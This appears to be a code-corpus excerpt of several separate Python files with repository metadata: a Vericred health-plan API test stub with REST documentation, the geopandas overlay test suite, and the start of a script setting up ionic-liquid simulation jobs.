np.savetxt(mat_fn, mat)
return reshaped_mats
def __str__(self):
return self.name
|
eljost/pysisyphus
|
pysisyphus/calculators/WFOWrapper.py
|
Python
|
gpl-3.0
| 13,194
|
[
"TURBOMOLE"
] |
0976d422dbdb4a310542a90cda7ccac17cefc03154e3ec2a0ae16bbd7a275fdb
|
# coding: utf-8
"""
Vericred API
Vericred's API allows you to search for Health Plans that a specific doctor
accepts.
## Getting Started
Visit our [Developer Portal](https://developers.vericred.com) to
create an account.
Once you have created an account, you can create one Application for
Production and another for our Sandbox (select the appropriate Plan when
you create the Application).
## SDKs
Our API follows standard REST conventions, so you can use any HTTP client
to integrate with us. You will likely find it easier to use one of our
[autogenerated SDKs](https://github.com/vericred/?query=vericred-),
which we make available for several common programming languages.
## Authentication
To authenticate, pass the API Key you created in the Developer Portal as
a `Vericred-Api-Key` header.
`curl -H 'Vericred-Api-Key: YOUR_KEY' "https://api.vericred.com/providers?search_term=Foo&zip_code=11215"`
## Versioning
    Vericred's API defaults to the latest version. However, if you need a specific
version, you can request it with an `Accept-Version` header.
The current version is `v3`. Previous versions are `v1` and `v2`.
`curl -H 'Vericred-Api-Key: YOUR_KEY' -H 'Accept-Version: v2' "https://api.vericred.com/providers?search_term=Foo&zip_code=11215"`
## Pagination
Endpoints that accept `page` and `per_page` parameters are paginated. They expose
four additional fields that contain data about your position in the response,
namely `Total`, `Per-Page`, `Link`, and `Page` as described in [RFC-5988](https://tools.ietf.org/html/rfc5988).
For example, to display 5 results per page and view the second page of a
`GET` to `/networks`, your final request would be `GET /networks?....page=2&per_page=5`.
## Sideloading
    When we return multiple levels of an object graph (e.g. `Provider`s and their `State`s),
we sideload the associated data. In this example, we would provide an Array of
`State`s and a `state_id` for each provider. This is done primarily to reduce the
payload size since many of the `Provider`s will share a `State`
```
{
providers: [{ id: 1, state_id: 1}, { id: 2, state_id: 1 }],
states: [{ id: 1, code: 'NY' }]
}
```
If you need the second level of the object graph, you can just match the
corresponding id.
## Selecting specific data
All endpoints allow you to specify which fields you would like to return.
This allows you to limit the response to contain only the data you need.
For example, let's take a request that returns the following JSON by default
```
{
provider: {
id: 1,
name: 'John',
phone: '1234567890',
field_we_dont_care_about: 'value_we_dont_care_about'
},
states: [{
id: 1,
name: 'New York',
code: 'NY',
field_we_dont_care_about: 'value_we_dont_care_about'
}]
}
```
To limit our results to only return the fields we care about, we specify the
`select` query string parameter for the corresponding fields in the JSON
document.
In this case, we want to select `name` and `phone` from the `provider` key,
so we would add the parameters `select=provider.name,provider.phone`.
We also want the `name` and `code` from the `states` key, so we would
add the parameters `select=states.name,states.code`. The id field of
each document is always returned whether or not it is requested.
Our final request would be `GET /providers/12345?select=provider.name,provider.phone,states.name,states.code`
The response would be
```
{
provider: {
id: 1,
name: 'John',
phone: '1234567890'
},
states: [{
id: 1,
name: 'New York',
code: 'NY'
}]
}
```
## Benefits summary format
Benefit cost-share strings are formatted to capture:
* Network tiers
* Compound or conditional cost-share
* Limits on the cost-share
* Benefit-specific maximum out-of-pocket costs
**Example #1**
As an example, we would represent [this Summary of Benefits & Coverage](https://s3.amazonaws.com/vericred-data/SBC/2017/33602TX0780032.pdf) as:
* **Hospital stay facility fees**:
- Network Provider: `$400 copay/admit plus 20% coinsurance`
- Out-of-Network Provider: `$1,500 copay/admit plus 50% coinsurance`
- Vericred's format for this benefit: `In-Network: $400 before deductible then 20% after deductible / Out-of-Network: $1,500 before deductible then 50% after deductible`
* **Rehabilitation services:**
- Network Provider: `20% coinsurance`
- Out-of-Network Provider: `50% coinsurance`
- Limitations & Exceptions: `35 visit maximum per benefit period combined with Chiropractic care.`
- Vericred's format for this benefit: `In-Network: 20% after deductible / Out-of-Network: 50% after deductible | limit: 35 visit(s) per Benefit Period`
**Example #2**
In [this other Summary of Benefits & Coverage](https://s3.amazonaws.com/vericred-data/SBC/2017/40733CA0110568.pdf), the **specialty_drugs** cost-share has a maximum out-of-pocket for in-network pharmacies.
* **Specialty drugs:**
- Network Provider: `40% coinsurance up to a $500 maximum for up to a 30 day supply`
- Out-of-Network Provider `Not covered`
- Vericred's format for this benefit: `In-Network: 40% after deductible, up to $500 per script / Out-of-Network: 100%`
**BNF**
Here's a description of the benefits summary string, represented as a context-free grammar:
```
root ::= coverage
coverage ::= (simple_coverage | tiered_coverage) (space pipe space coverage_modifier)?
tiered_coverage ::= tier (space slash space tier)*
tier ::= tier_name colon space (tier_coverage | not_applicable)
tier_coverage ::= simple_coverage (space (then | or | and) space simple_coverage)* tier_limitation?
simple_coverage ::= (pre_coverage_limitation space)? coverage_amount (space post_coverage_limitation)? (comma? space coverage_condition)?
coverage_modifier ::= limit_condition colon space (((simple_coverage | simple_limitation) (semicolon space see_carrier_documentation)?) | see_carrier_documentation | waived_if_admitted | shared_across_tiers)
waived_if_admitted ::= ("copay" space)? "waived if admitted"
simple_limitation ::= pre_coverage_limitation space "copay applies"
tier_name ::= "In-Network-Tier-2" | "Out-of-Network" | "In-Network"
limit_condition ::= "limit" | "condition"
tier_limitation ::= comma space "up to" space (currency | (integer space time_unit plural?)) (space post_coverage_limitation)?
coverage_amount ::= currency | unlimited | included | unknown | percentage | (digits space (treatment_unit | time_unit) plural?)
pre_coverage_limitation ::= first space digits space time_unit plural?
post_coverage_limitation ::= (((then space currency) | "per condition") space)? "per" space (treatment_unit | (integer space time_unit) | time_unit) plural?
coverage_condition ::= ("before deductible" | "after deductible" | "penalty" | allowance | "in-state" | "out-of-state") (space allowance)?
allowance ::= upto_allowance | after_allowance
upto_allowance ::= "up to" space (currency space)? "allowance"
after_allowance ::= "after" space (currency space)? "allowance"
see_carrier_documentation ::= "see carrier documentation for more information"
shared_across_tiers ::= "shared across all tiers"
unknown ::= "unknown"
unlimited ::= /[uU]nlimited/
included ::= /[iI]ncluded in [mM]edical/
time_unit ::= /[hH]our/ | (((/[cC]alendar/ | /[cC]ontract/) space)? /[yY]ear/) | /[mM]onth/ | /[dD]ay/ | /[wW]eek/ | /[vV]isit/ | /[lL]ifetime/ | ((((/[bB]enefit/ plural?) | /[eE]ligibility/) space)? /[pP]eriod/)
treatment_unit ::= /[pP]erson/ | /[gG]roup/ | /[cC]ondition/ | /[sS]cript/ | /[vV]isit/ | /[eE]xam/ | /[iI]tem/ | /[sS]tay/ | /[tT]reatment/ | /[aA]dmission/ | /[eE]pisode/
comma ::= ","
colon ::= ":"
semicolon ::= ";"
pipe ::= "|"
slash ::= "/"
plural ::= "(s)" | "s"
then ::= "then" | ("," space) | space
or ::= "or"
and ::= "and"
not_applicable ::= "Not Applicable" | "N/A" | "NA"
first ::= "first"
currency ::= "$" number
percentage ::= number "%"
number ::= float | integer
float ::= digits "." digits
integer ::= /[0-9]/+ (comma_int | under_int)*
comma_int ::= ("," /[0-9]/*3) !"_"
under_int ::= ("_" /[0-9]/*3) !","
digits ::= /[0-9]/+ ("_" /[0-9]/+)*
space ::= /[ \t]/+
```
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import os
import sys
import unittest
import vericred_client
from vericred_client.rest import ApiException
from vericred_client.apis.plans_api import PlansApi
class TestPlansApi(unittest.TestCase):
""" PlansApi unit test stubs """
def setUp(self):
self.api = vericred_client.apis.plans_api.PlansApi()
def tearDown(self):
pass
def test_find_plans(self):
"""
Test case for find_plans
Find Plans
"""
pass
def test_show_plan(self):
"""
Test case for show_plan
Show Plan
"""
pass
if __name__ == '__main__':
unittest.main()
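# Sketch of the raw HTTP call the generated client wraps (editor's
# illustration, mirroring the curl and `select` examples from the module
# docstring; not part of the test suite):
#
#   import requests
#   resp = requests.get(
#       "https://api.vericred.com/providers",
#       params={"search_term": "Foo", "zip_code": "11215",
#               "select": "provider.name,provider.phone"},
#       headers={"Vericred-Api-Key": "YOUR_KEY"},
#   )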
|
vericred/vericred-python
|
test/test_plans_api.py
|
Python
|
apache-2.0
| 10,125
|
[
"VisIt"
] |
67ec9fe59b61f9b8ae9ae551afbfdc97fc4348f7bfb54632eedbe4513867d66f
|
import os
from distutils.version import LooseVersion
import numpy as np
import pandas as pd
from shapely.geometry import Point, Polygon, LineString, GeometryCollection, box
from fiona.errors import DriverError
import geopandas
from geopandas import GeoDataFrame, GeoSeries, overlay, read_file
from geopandas import _compat
from geopandas.testing import assert_geodataframe_equal, assert_geoseries_equal
import pytest
DATA = os.path.join(os.path.abspath(os.path.dirname(__file__)), "data", "overlay")
pytestmark = pytest.mark.skip_no_sindex
pandas_133 = pd.__version__ == LooseVersion("1.3.3")
@pytest.fixture
def dfs(request):
s1 = GeoSeries(
[
Polygon([(0, 0), (2, 0), (2, 2), (0, 2)]),
Polygon([(2, 2), (4, 2), (4, 4), (2, 4)]),
]
)
s2 = GeoSeries(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
df1 = GeoDataFrame({"col1": [1, 2], "geometry": s1})
df2 = GeoDataFrame({"col2": [1, 2], "geometry": s2})
return df1, df2
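# Editor's note: the two pairs of squares above overlap pairwise, so
# overlay(df1, df2, how="intersection") yields three 1x1 squares,
# (1,1)-(2,2), (2,2)-(3,3) and (3,3)-(4,4), each with area 1.0.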
@pytest.fixture(params=["default-index", "int-index", "string-index"])
def dfs_index(request, dfs):
df1, df2 = dfs
if request.param == "int-index":
df1.index = [1, 2]
df2.index = [0, 2]
if request.param == "string-index":
df1.index = ["row1", "row2"]
return df1, df2
@pytest.fixture(
params=["union", "intersection", "difference", "symmetric_difference", "identity"]
)
def how(request):
if pandas_133 and request.param in ["symmetric_difference", "identity", "union"]:
pytest.xfail("Regression in pandas 1.3.3 (GH #2101)")
return request.param
@pytest.fixture(params=[True, False])
def keep_geom_type(request):
return request.param
def test_overlay(dfs_index, how):
"""
Basic overlay test with small dummy example dataframes (from docs).
Results obtained using QGIS 2.16 (Vector -> Geoprocessing Tools ->
Intersection / Union / ...), saved to GeoJSON
"""
df1, df2 = dfs_index
result = overlay(df1, df2, how=how)
# construction of result
def _read(name):
expected = read_file(
os.path.join(DATA, "polys", "df1_df2-{0}.geojson".format(name))
)
expected.crs = None
return expected
if how == "identity":
expected_intersection = _read("intersection")
expected_difference = _read("difference")
expected = pd.concat(
[expected_intersection, expected_difference], ignore_index=True, sort=False
)
expected["col1"] = expected["col1"].astype(float)
else:
expected = _read(how)
# TODO needed adaptations to result
if how == "union":
result = result.sort_values(["col1", "col2"]).reset_index(drop=True)
elif how == "difference":
result = result.reset_index(drop=True)
assert_geodataframe_equal(result, expected, check_column_type=False)
# for difference also reversed
if how == "difference":
result = overlay(df2, df1, how=how)
result = result.reset_index(drop=True)
expected = _read("difference-inverse")
assert_geodataframe_equal(result, expected, check_column_type=False)
@pytest.mark.filterwarnings("ignore:GeoSeries crs mismatch:UserWarning")
def test_overlay_nybb(how):
polydf = read_file(geopandas.datasets.get_path("nybb"))
# The circles have been constructed and saved at the time the expected
# results were created (exact output of buffer algorithm can slightly
# change over time -> use saved ones)
# # construct circles dataframe
# N = 10
# b = [int(x) for x in polydf.total_bounds]
# polydf2 = GeoDataFrame(
# [
# {"geometry": Point(x, y).buffer(10000), "value1": x + y, "value2": x - y}
# for x, y in zip(
# range(b[0], b[2], int((b[2] - b[0]) / N)),
# range(b[1], b[3], int((b[3] - b[1]) / N)),
# )
# ],
# crs=polydf.crs,
# )
polydf2 = read_file(os.path.join(DATA, "nybb_qgis", "polydf2.shp"))
result = overlay(polydf, polydf2, how=how)
cols = ["BoroCode", "BoroName", "Shape_Leng", "Shape_Area", "value1", "value2"]
if how == "difference":
cols = cols[:-2]
# expected result
if how == "identity":
# read union one, further down below we take the appropriate subset
expected = read_file(os.path.join(DATA, "nybb_qgis", "qgis-union.shp"))
else:
expected = read_file(
os.path.join(DATA, "nybb_qgis", "qgis-{0}.shp".format(how))
)
    # The result of QGIS for 'union' contains incorrect geometries:
    # 24 is a full original circle overlapping with unioned geometries, and
    # 27 is a completely duplicated row
if how == "union":
expected = expected.drop([24, 27])
expected.reset_index(inplace=True, drop=True)
# Eliminate observations without geometries (issue from QGIS)
expected = expected[expected.is_valid]
expected.reset_index(inplace=True, drop=True)
if how == "identity":
expected = expected[expected.BoroCode.notnull()].copy()
# Order GeoDataFrames
expected = expected.sort_values(cols).reset_index(drop=True)
# TODO needed adaptations to result
result = result.sort_values(cols).reset_index(drop=True)
if how in ("union", "identity"):
# concat < 0.23 sorts, so changes the order of the columns
# but at least we ensure 'geometry' is the last column
assert result.columns[-1] == "geometry"
assert len(result.columns) == len(expected.columns)
result = result.reindex(columns=expected.columns)
# the ordering of the spatial index results causes slight deviations
# in the resultant geometries for multipolygons
# for more details on the discussion, see:
# https://github.com/geopandas/geopandas/pull/1338
# https://github.com/geopandas/geopandas/issues/1337
# Temporary workaround below:
# simplify multipolygon geometry comparison
# since the order of the constituent polygons depends on
# the ordering of spatial indexing results, we cannot
# compare symmetric_difference results directly when the
# resultant geometry is a multipolygon
# first, check that all bounds and areas are approx equal
# this is a very rough check for multipolygon equality
if not _compat.PANDAS_GE_11:
kwargs = dict(check_less_precise=True)
else:
kwargs = {}
pd.testing.assert_series_equal(
result.geometry.area, expected.geometry.area, **kwargs
)
pd.testing.assert_frame_equal(
result.geometry.bounds, expected.geometry.bounds, **kwargs
)
# There are two cases where the multipolygon have a different number
# of sub-geometries -> not solved by normalize (and thus drop for now)
if how == "symmetric_difference":
expected.loc[9, "geometry"] = None
result.loc[9, "geometry"] = None
if how == "union":
expected.loc[24, "geometry"] = None
result.loc[24, "geometry"] = None
assert_geodataframe_equal(
result,
expected,
normalize=True,
check_crs=False,
check_column_type=False,
check_less_precise=True,
)
def test_overlay_overlap(how):
"""
Overlay test with overlapping geometries in both dataframes.
Test files are created with::
import geopandas
from geopandas import GeoSeries, GeoDataFrame
from shapely.geometry import Point, Polygon, LineString
s1 = GeoSeries([Point(0, 0), Point(1.5, 0)]).buffer(1, resolution=2)
s2 = GeoSeries([Point(1, 1), Point(2, 2)]).buffer(1, resolution=2)
df1 = GeoDataFrame({'geometry': s1, 'col1':[1,2]})
df2 = GeoDataFrame({'geometry': s2, 'col2':[1, 2]})
ax = df1.plot(alpha=0.5)
df2.plot(alpha=0.5, ax=ax, color='C1')
df1.to_file('geopandas/geopandas/tests/data/df1_overlap.geojson',
driver='GeoJSON')
df2.to_file('geopandas/geopandas/tests/data/df2_overlap.geojson',
driver='GeoJSON')
and then overlay results are obtained from using QGIS 2.16
(Vector -> Geoprocessing Tools -> Intersection / Union / ...),
saved to GeoJSON.
"""
df1 = read_file(os.path.join(DATA, "overlap", "df1_overlap.geojson"))
df2 = read_file(os.path.join(DATA, "overlap", "df2_overlap.geojson"))
result = overlay(df1, df2, how=how)
if how == "identity":
pytest.skip("no saved expected result for 'identity'")
expected = read_file(
os.path.join(DATA, "overlap", "df1_df2_overlap-{0}.geojson".format(how))
)
if how == "union":
# the QGIS result has the last row duplicated, so removing this
expected = expected.iloc[:-1]
# TODO needed adaptations to result
result = result.reset_index(drop=True)
if how == "union":
result = result.sort_values(["col1", "col2"]).reset_index(drop=True)
assert_geodataframe_equal(
result,
expected,
normalize=True,
check_column_type=False,
check_less_precise=True,
)
@pytest.mark.parametrize("other_geometry", [False, True])
def test_geometry_not_named_geometry(dfs, how, other_geometry):
# Issue #306
# Add points and flip names
df1, df2 = dfs
df3 = df1.copy()
df3 = df3.rename(columns={"geometry": "polygons"})
df3 = df3.set_geometry("polygons")
if other_geometry:
df3["geometry"] = df1.centroid.geometry
assert df3.geometry.name == "polygons"
res1 = overlay(df1, df2, how=how)
res2 = overlay(df3, df2, how=how)
assert df3.geometry.name == "polygons"
if how == "difference":
# in case of 'difference', column names of left frame are preserved
assert res2.geometry.name == "polygons"
if other_geometry:
assert "geometry" in res2.columns
assert_geoseries_equal(
res2["geometry"], df3["geometry"], check_series_type=False
)
res2 = res2.drop(["geometry"], axis=1)
res2 = res2.rename(columns={"polygons": "geometry"})
res2 = res2.set_geometry("geometry")
# TODO if existing column is overwritten -> geometry not last column
if other_geometry and how == "intersection":
res2 = res2.reindex(columns=res1.columns)
assert_geodataframe_equal(res1, res2)
df4 = df2.copy()
df4 = df4.rename(columns={"geometry": "geom"})
df4 = df4.set_geometry("geom")
if other_geometry:
df4["geometry"] = df2.centroid.geometry
assert df4.geometry.name == "geom"
res1 = overlay(df1, df2, how=how)
res2 = overlay(df1, df4, how=how)
assert_geodataframe_equal(res1, res2)
def test_bad_how(dfs):
df1, df2 = dfs
with pytest.raises(ValueError):
overlay(df1, df2, how="spandex")
def test_duplicate_column_name(dfs, how):
if how == "difference":
pytest.skip("Difference uses columns from one df only.")
df1, df2 = dfs
df2r = df2.rename(columns={"col2": "col1"})
res = overlay(df1, df2r, how=how)
assert ("col1_1" in res.columns) and ("col1_2" in res.columns)
def test_geoseries_warning(dfs):
df1, df2 = dfs
# Issue #305
with pytest.raises(NotImplementedError):
overlay(df1, df2.geometry, how="union")
def test_preserve_crs(dfs, how):
df1, df2 = dfs
result = overlay(df1, df2, how=how)
assert result.crs is None
crs = "epsg:4326"
df1.crs = crs
df2.crs = crs
result = overlay(df1, df2, how=how)
assert result.crs == crs
def test_crs_mismatch(dfs, how):
df1, df2 = dfs
df1.crs = 4326
df2.crs = 3857
with pytest.warns(UserWarning, match="CRS mismatch between the CRS"):
overlay(df1, df2, how=how)
def test_empty_intersection(dfs):
df1, df2 = dfs
polys3 = GeoSeries(
[
Polygon([(-1, -1), (-3, -1), (-3, -3), (-1, -3)]),
Polygon([(-3, -3), (-5, -3), (-5, -5), (-3, -5)]),
]
)
df3 = GeoDataFrame({"geometry": polys3, "col3": [1, 2]})
expected = GeoDataFrame([], columns=["col1", "col3", "geometry"])
result = overlay(df1, df3)
assert_geodataframe_equal(result, expected, check_dtype=False)
def test_correct_index(dfs):
# GH883 - case where the index was not properly reset
df1, df2 = dfs
polys3 = GeoSeries(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(-1, 1), (1, 1), (1, 3), (-1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
df3 = GeoDataFrame({"geometry": polys3, "col3": [1, 2, 3]})
i1 = Polygon([(1, 1), (1, 3), (3, 3), (3, 1), (1, 1)])
i2 = Polygon([(3, 3), (3, 5), (5, 5), (5, 3), (3, 3)])
expected = GeoDataFrame(
[[1, 1, i1], [3, 2, i2]], columns=["col3", "col2", "geometry"]
)
result = overlay(df3, df2, keep_geom_type=True)
assert_geodataframe_equal(result, expected)
def test_warn_on_keep_geom_type(dfs):
df1, df2 = dfs
polys3 = GeoSeries(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(-1, 1), (1, 1), (1, 3), (-1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
df3 = GeoDataFrame({"geometry": polys3})
with pytest.warns(UserWarning, match="`keep_geom_type=True` in overlay"):
overlay(df2, df3, keep_geom_type=None)
@pytest.mark.parametrize(
"geom_types", ["polys", "poly_line", "poly_point", "line_poly", "point_poly"]
)
def test_overlay_strict(how, keep_geom_type, geom_types):
"""
Test of mixed geometry types on input and output. Expected results initially
generated using following snippet.
polys1 = gpd.GeoSeries([Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)])])
df1 = gpd.GeoDataFrame({'col1': [1, 2], 'geometry': polys1})
polys2 = gpd.GeoSeries([Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(-1, 1), (1, 1), (1, 3), (-1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)])])
df2 = gpd.GeoDataFrame({'geometry': polys2, 'col2': [1, 2, 3]})
lines1 = gpd.GeoSeries([LineString([(2, 0), (2, 4), (6, 4)]),
LineString([(0, 3), (6, 3)])])
df3 = gpd.GeoDataFrame({'col3': [1, 2], 'geometry': lines1})
points1 = gpd.GeoSeries([Point((2, 2)),
Point((3, 3))])
df4 = gpd.GeoDataFrame({'col4': [1, 2], 'geometry': points1})
params=["union", "intersection", "difference", "symmetric_difference",
"identity"]
stricts = [True, False]
for p in params:
for s in stricts:
exp = gpd.overlay(df1, df2, how=p, keep_geom_type=s)
if not exp.empty:
exp.to_file('polys_{p}_{s}.geojson'.format(p=p, s=s),
driver='GeoJSON')
for p in params:
for s in stricts:
exp = gpd.overlay(df1, df3, how=p, keep_geom_type=s)
if not exp.empty:
exp.to_file('poly_line_{p}_{s}.geojson'.format(p=p, s=s),
driver='GeoJSON')
for p in params:
for s in stricts:
exp = gpd.overlay(df1, df4, how=p, keep_geom_type=s)
if not exp.empty:
exp.to_file('poly_point_{p}_{s}.geojson'.format(p=p, s=s),
driver='GeoJSON')
"""
polys1 = GeoSeries(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
df1 = GeoDataFrame({"col1": [1, 2], "geometry": polys1})
polys2 = GeoSeries(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(-1, 1), (1, 1), (1, 3), (-1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
df2 = GeoDataFrame({"geometry": polys2, "col2": [1, 2, 3]})
lines1 = GeoSeries(
[LineString([(2, 0), (2, 4), (6, 4)]), LineString([(0, 3), (6, 3)])]
)
df3 = GeoDataFrame({"col3": [1, 2], "geometry": lines1})
points1 = GeoSeries([Point((2, 2)), Point((3, 3))])
df4 = GeoDataFrame({"col4": [1, 2], "geometry": points1})
if geom_types == "polys":
result = overlay(df1, df2, how=how, keep_geom_type=keep_geom_type)
elif geom_types == "poly_line":
result = overlay(df1, df3, how=how, keep_geom_type=keep_geom_type)
elif geom_types == "poly_point":
result = overlay(df1, df4, how=how, keep_geom_type=keep_geom_type)
elif geom_types == "line_poly":
result = overlay(df3, df1, how=how, keep_geom_type=keep_geom_type)
elif geom_types == "point_poly":
result = overlay(df4, df1, how=how, keep_geom_type=keep_geom_type)
try:
expected = read_file(
os.path.join(
DATA,
"strict",
"{t}_{h}_{s}.geojson".format(t=geom_types, h=how, s=keep_geom_type),
)
)
# the order depends on the spatial index used
# so we sort the resultant dataframes to get a consistent order
# independently of the spatial index implementation
assert all(expected.columns == result.columns), "Column name mismatch"
cols = list(set(result.columns) - set(["geometry"]))
expected = expected.sort_values(cols, axis=0).reset_index(drop=True)
result = result.sort_values(cols, axis=0).reset_index(drop=True)
assert_geodataframe_equal(
result,
expected,
normalize=True,
check_column_type=False,
check_less_precise=True,
check_crs=False,
check_dtype=False,
)
except DriverError: # fiona >= 1.8
assert result.empty
except OSError: # fiona < 1.8
assert result.empty
def test_mixed_geom_error():
polys1 = GeoSeries(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
df1 = GeoDataFrame({"col1": [1, 2], "geometry": polys1})
mixed = GeoSeries(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
LineString([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
dfmixed = GeoDataFrame({"col1": [1, 2], "geometry": mixed})
with pytest.raises(NotImplementedError):
overlay(df1, dfmixed, keep_geom_type=True)
def test_keep_geom_type_error():
gcol = GeoSeries(
GeometryCollection(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
LineString([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
)
dfcol = GeoDataFrame({"col1": [2], "geometry": gcol})
polys1 = GeoSeries(
[
Polygon([(1, 1), (3, 1), (3, 3), (1, 3)]),
Polygon([(3, 3), (5, 3), (5, 5), (3, 5)]),
]
)
df1 = GeoDataFrame({"col1": [1, 2], "geometry": polys1})
with pytest.raises(TypeError):
overlay(dfcol, df1, keep_geom_type=True)
def test_keep_geom_type_geometry_collection():
# GH 1581
df1 = read_file(os.path.join(DATA, "geom_type", "df1.geojson"))
df2 = read_file(os.path.join(DATA, "geom_type", "df2.geojson"))
with pytest.warns(UserWarning, match="`keep_geom_type=True` in overlay"):
intersection = overlay(df1, df2, keep_geom_type=None)
assert len(intersection) == 1
assert (intersection.geom_type == "Polygon").all()
intersection = overlay(df1, df2, keep_geom_type=True)
assert len(intersection) == 1
assert (intersection.geom_type == "Polygon").all()
intersection = overlay(df1, df2, keep_geom_type=False)
assert len(intersection) == 1
assert (intersection.geom_type == "GeometryCollection").all()
def test_keep_geom_type_geometry_collection2():
polys1 = [
box(0, 0, 1, 1),
box(1, 1, 3, 3).union(box(1, 3, 5, 5)),
]
polys2 = [
box(0, 0, 1, 1),
box(3, 1, 4, 2).union(box(4, 1, 5, 4)),
]
df1 = GeoDataFrame({"left": [0, 1], "geometry": polys1})
df2 = GeoDataFrame({"right": [0, 1], "geometry": polys2})
result1 = overlay(df1, df2, keep_geom_type=True)
expected1 = GeoDataFrame(
{
"left": [0, 1],
"right": [0, 1],
"geometry": [box(0, 0, 1, 1), box(4, 3, 5, 4)],
}
)
assert_geodataframe_equal(result1, expected1)
result1 = overlay(df1, df2, keep_geom_type=False)
expected1 = GeoDataFrame(
{
"left": [0, 1, 1],
"right": [0, 0, 1],
"geometry": [
box(0, 0, 1, 1),
Point(1, 1),
GeometryCollection([box(4, 3, 5, 4), LineString([(3, 1), (3, 2)])]),
],
}
)
assert_geodataframe_equal(result1, expected1)
@pytest.mark.parametrize("make_valid", [True, False])
def test_overlap_make_valid(make_valid):
bowtie = Polygon([(1, 1), (9, 9), (9, 1), (1, 9), (1, 1)])
assert not bowtie.is_valid
fixed_bowtie = bowtie.buffer(0)
assert fixed_bowtie.is_valid
df1 = GeoDataFrame({"col1": ["region"], "geometry": GeoSeries([box(0, 0, 10, 10)])})
df_bowtie = GeoDataFrame(
{"col1": ["invalid", "valid"], "geometry": GeoSeries([bowtie, fixed_bowtie])}
)
if make_valid:
df_overlay_bowtie = overlay(df1, df_bowtie, make_valid=make_valid)
assert df_overlay_bowtie.at[0, "geometry"].equals(fixed_bowtie)
assert df_overlay_bowtie.at[1, "geometry"].equals(fixed_bowtie)
else:
with pytest.raises(ValueError, match="1 invalid input geometries"):
overlay(df1, df_bowtie, make_valid=make_valid)
def test_empty_overlay_return_non_duplicated_columns():
nybb = geopandas.read_file(geopandas.datasets.get_path("nybb"))
nybb2 = nybb.copy()
nybb2.geometry = nybb2.translate(20000000)
result = geopandas.overlay(nybb, nybb2)
expected = GeoDataFrame(
columns=[
"BoroCode_1",
"BoroName_1",
"Shape_Leng_1",
"Shape_Area_1",
"BoroCode_2",
"BoroName_2",
"Shape_Leng_2",
"Shape_Area_2",
"geometry",
],
crs=nybb.crs,
)
assert_geodataframe_equal(result, expected, check_dtype=False)
def test_non_overlapping(how):
p1 = Polygon([(0, 0), (2, 0), (2, 2), (0, 2)])
p2 = Polygon([(3, 3), (5, 3), (5, 5), (3, 5)])
df1 = GeoDataFrame({"col1": [1], "geometry": [p1]})
df2 = GeoDataFrame({"col2": [2], "geometry": [p2]})
result = overlay(df1, df2, how=how)
if how == "intersection":
expected = GeoDataFrame(
{
"col1": np.array([], dtype="int64"),
"col2": np.array([], dtype="int64"),
"geometry": [],
},
index=pd.Index([], dtype="object"),
)
elif how == "union":
expected = GeoDataFrame(
{
"col1": [1, np.nan],
"col2": [np.nan, 2],
"geometry": [p1, p2],
}
)
elif how == "identity":
expected = GeoDataFrame(
{
"col1": [1.0],
"col2": [np.nan],
"geometry": [p1],
}
)
elif how == "symmetric_difference":
expected = GeoDataFrame(
{
"col1": [1, np.nan],
"col2": [np.nan, 2],
"geometry": [p1, p2],
}
)
elif how == "difference":
expected = GeoDataFrame(
{
"col1": [1],
"geometry": [p1],
}
)
assert_geodataframe_equal(result, expected)
|
jdmcbr/geopandas
|
geopandas/tests/test_overlay.py
|
Python
|
bsd-3-clause
| 23,953
|
[
"Bowtie"
] |
5e3d575d19a5433db5eb3fc37c3f91ef98d73f5e878180e8cd08e0ec1c212097
|
#!/home/aubbwc/usr/bin/python3
# ABOUT-----------------------------------------------------------------------
# setting up jobs for Ewald alternative calculations.
# CATIONS =
# Imidazolium based: MMIM, EMIM, BMIM, HMIM, OMIM
# Pyridinum based: MPYR, EPYR, BPYR, HPYR, OPYR
# ANIONS =
# BF4, PF6, Cl, AlCl4, Al2Cl4, NO3, TfO
#
# Going to have different values for solvent-solvent cutoffs:
# 9A, 12A, 15A
#
# Alternative methods to Ewald summations:
# Shifted Force (SF) : may scale by 0.1, 0.2, 0.3
# Shifted Potential (SP) : may also scale
# Shifted Force Gradient (SFG)
# (DC)
# CHARMM
#-------------------------------------------------------------------------------
import os,sys, shutil
import subprocess
from glob import glob
from time import time
starttime = time()
# important file paths
homedir = os.getcwd()
datafiles = os.path.join(homedir, 'datafiles')
infiles = os.path.join(datafiles, 'infiles')
slvzmats = os.path.join(datafiles, 'slvzmats')
# list of cations
imid_cations = ['MMIM', 'EMIM', 'BMIM', 'HMIM', 'OMIM']
pyr_cations = ['MPYR', 'EPYR', 'BPYR', 'HPYR', 'OPYR']
# NOTE: OMIM and OPYR do not have infiles for ACL's.
# NOTE: BMIM_ACL, EMIM_ACL, and HMIM_ACL are cases which need to be handled
# differently. The OPLS_IL.par file must be changed.
# methods, scaling factors, cutoffs
